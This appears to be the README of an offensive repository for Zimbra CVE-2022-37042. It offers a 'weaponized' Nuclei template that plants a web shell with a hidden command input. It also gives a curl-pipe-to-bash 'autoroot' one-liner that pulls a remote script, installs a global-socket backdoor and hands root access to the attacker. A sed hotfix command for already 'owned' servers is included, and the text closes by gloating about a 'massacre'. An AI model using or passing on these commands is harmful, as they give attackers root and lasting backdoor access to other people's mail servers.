


<img width="918" alt="image" src="https://user-images.githubusercontent.com/1212294/186645204-ba8e7f0d-fbf0-4392-aab0-7924e48dcf77.png">

Zimbra CVE-2022-37042 Nuclei weaponized template

shell path: /public/formatter.jsp

Nuclei itself: https://github.com/projectdiscovery/nuclei

shell have hidden input with 0 opacity, so just hover mouse over it, type command, then press [Enter] key:

<img width="838" alt="image" src="https://user-images.githubusercontent.com/1212294/187246401-ce867e01-de9f-4344-bc98-fb67e635632a.png">

example shell url:


CVE-2022-37042 hotfix to patch owned servers

issue this command (but only once):

cd /opt/zimbra/conf/nginx/templates/; sed -i 's|location ~\* \^/zmerror_|location = /service/extension/backup/mboximport { return 403; }\n    location ~\* \^/zmerror_|' nginx.conf.web.http*; /opt/zimbra/bin/zmproxyctl restart;

need additional code to servers with not Nginx but Apache. Pull requests are wellcome.

Zimbra autoroot via zimbslap

curl -fskSL raw.githubusercontent.com/aels/zimbra-slapper/main/slapper.sh | bash 2>&1

this command will install global-socket (https://www.gsocket.io/deploy/) and pass you the key to connect as root.

get zimbra ips


happy birthday massacre, motherfuckers ;)